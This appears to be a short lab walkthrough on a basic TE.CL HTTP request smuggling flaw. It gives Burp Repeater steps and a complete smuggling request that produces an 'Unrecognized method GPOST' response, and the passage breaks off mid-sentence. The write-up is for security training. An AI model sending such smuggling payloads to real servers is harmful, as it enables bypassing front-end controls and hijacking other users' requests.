HTTP request smuggling, basic TE.CL vulnerability
This lab involves a front-end and back-end server, and the two servers handle duplicate HTTP request headers in different ways. The front-end server rejects requests that aren’t using the GET or POST method.
Reproduction and proof of concept
In Burp Suite, disable the Autoupdate content length in Repeater (in the topmost menu row)
Using Burp Repeater, issue the following request twice:
POST / HTTP/1.1 Host: lab-id.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-length: 4 Transfer-Encoding: chunked 5c GPOST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Content-Length: 15 x=1 0
The second (or third) response should say:
Unrecognized method GPOST.
An attacker will need to smuggle a request to the back-end server, so that the next request processed by the back-end server appears to use the method